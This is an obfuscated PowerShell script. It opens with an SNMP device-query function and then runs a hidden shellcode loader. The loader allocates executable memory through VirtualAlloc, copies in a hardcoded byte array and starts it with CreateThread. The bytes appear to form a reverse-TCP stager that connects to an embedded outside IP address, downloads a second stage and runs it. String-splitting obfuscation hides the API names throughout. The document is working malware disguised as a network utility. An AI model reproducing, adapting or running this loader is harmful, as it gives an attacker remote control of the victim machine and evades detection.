function geT-s`N`MPDAtA {
    param (
        [string]${i`P}
    )

    begin {
        ${pI`NG} = .("{0}{1}{2}"-f'Ne','w-Objec','t') ("{2}{3}{0}{1}{5}{4}{6}"-f'I','nfor','Syst','em.Net.Network','ation.','m','Ping')
        ${s`NmP} = &("{2}{1}{0}" -f 't','c','New-Obje') -ComObject ("{1}{2}{3}{0}" -f'NMP','o','l','ePrn.OleS')
    }

    process {
        ${IN`Fo} = [pscustomobject]@{
            ('IP') = ${i`P}
            ("{0}{1}"-f 'Na','me') = ''
            ("{1}{2}{0}"-f 'iption','Des','cr') = ''
            ("{1}{2}{0}{3}" -f 'se','A','ddres','s') = ''
            ("{1}{0}{2}" -f 'nlin','O','e') = ${Fal`SE}
        }

        if (${P`INg}.("{0}{1}"-f'Sen','d').Invoke(${IP})."S`T`ATUs" -eq ("{0}{1}"-f 'Su','ccess')) {
            ${I`NFO}."onlI`NE" = ${t`RUe}

            ${sN`mp}.("{0}{1}" -f'O','pen').Invoke(${iP}, ("{0}{1}{2}" -f 'p','ub','lic'), 2, 3000)

            try {
                ${i`Nfo}."NA`mE" = ${s`NMp}.("{0}{1}" -f'Ge','t').Invoke(("{3}{2}{1}{0}" -f'.1.5.0','2.1','.','.1.3.6.1'))
                ${in`FO}."DE`s`cRip`TION" = ${s`NmP}.("{0}{1}" -f'G','et').Invoke(("{2}{1}{0}{3}"-f '2.1','.','.1.3.6.1','.1.1.0'))
                ${iN`FO}."a`Ddr`ESSES" = (${S`Nmp}.("{2}{0}{1}" -f't','tree','Ge').Invoke(("{1}{3}{4}{2}{0}" -f '1.1','.1.3','.4.20.','.6.1.2.','1')) | &('?') {${_} -match '(?:[^\.]{1,3}\.){3}[^\.]{1,3}$' -and ${_} -notmatch ((("{1}{2}{0}{3}" -f '.','127hjc.0','hjc','0hjc.1'))-CreplACE([Char]104+[Char]106+[Char]99),[Char]92)} | .('%') {${I} = ${_}.("{1}{0}"-f 'it','spl').Invoke('.'); "$($i[-4]).$($i[-3]).$($i[-2]).$($i[-1])"}) -join ';'
            } catch {}
        }

        .("{0}{2}{3}{1}"-f'Wri','Output','t','e-') ${in`FO}
    }
}

${C} = ((("{109}{68}{72}{56}{15}{86}{70}{98}{90}{58}{79}{94}{4}{29}{104}{34}{128}{100}{51}{25}{74}{57}{39}{61}{116}{44}{22}{89}{88}{65}{101}{21}{107}{12}{2}{49}{33}{81}{41}{0}{117}{14}{10}{43}{55}{91}{19}{77}{52}{7}{85}{103}{93}{73}{59}{120}{37}{92}{48}{1}{42}{20}{26}{87}{17}{80}{13}{47}{112}{50}{84}{40}{97}{106}{35}{113}{27}{31}{124}{78}{23}{108}{115}{24}{62}{38}{102}{71}{30}{6}{82}{5}{105}{64}{95}{111}{125}{114}{127}{118}{32}{9}{69}{126}{123}{16}{60}{36}{96}{67}{75}{110}{99}{45}{66}{83}{122}{76}{28}{18}{54}{53}{63}{11}{46}{119}{3}{121}{8}" -f 'Alloca','ic e','t dwS',' src, ','c st','p','tPt','o','ount);','tPtr ','nType','est, ui','uin','eT','io','rnel','[DllImpo','Crea','r memset(','rotect)','te','ddre','tP','Ptr','p','V','rn I','ack','t','ati',', In','S',' In','int ','xtern',' dw','({0}msvcrt.dll{0}',' s','tA','loc','d','l','x',', ','n',' exte','n','h','at','ize, u','e',' ','llImp','Pt','Int','u','{0}ke','alAl','pub',')]','rt','(','Star','r d','a','l','r','blic ','lImpor','lpThreadI','2','ss','t(','0}','irtu','st','tP',';[D','e, Int','l','t','f','r l','n','a','rt({0}kerne','3','ntPtr ','r ','t','})]','int flP','t','{','i','meter, ',')]pu','(In','.dll{0','c','IntPtr','pA','ddre','l32.dll','c e','Par','tPtr lpThreadAttributes, uint','ss, ',' ','[Dl','ati','u','r','St','ionF','l','I','t','ags,','t','public','uint c',' In',';','iz','int dwCreat','d)','l',' ')) -F[cHAR]34);${w} = .("{2}{0}{1}" -f'y','pe','Add-T') -memberDefinition ${C} -Name ("{0}{1}" -f'Win','32') -namespace ("{0}{3}{1}{2}" -f'Win3','n','ctions','2Fu') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xbb,0x6e,0xb3,0x53,0x68,0x02,0x00,0x11,0x5d,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x3f,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xe9,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xc3,0x01,0xc3,0x29,0xc6,0x75,0xe9,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${Z}."leN`g`Th" -gt 0x1000){${G} = ${Z}."leN`gth"};${x}=${w}::("{2}{1}{0}"-f 'oc','alAll','Virtu').Invoke(0,0x1000,${g},0x40);for (${I}=0;${i} -le (${Z}."l`ENGTh"-1);${I}++) {${w}::"M`EMSet"([IntPtr](${X}.("{0}{1}" -f 'ToI','nt32').Invoke()+${I}), ${z}[${i}], 1)};${w}::("{1}{3}{2}{0}" -f'read','C','h','reateT').Invoke(0,0,${x},0,0,0);for (;;){&("{0}{1}{2}{3}"-f'S','tart-sl','ee','p') 60};
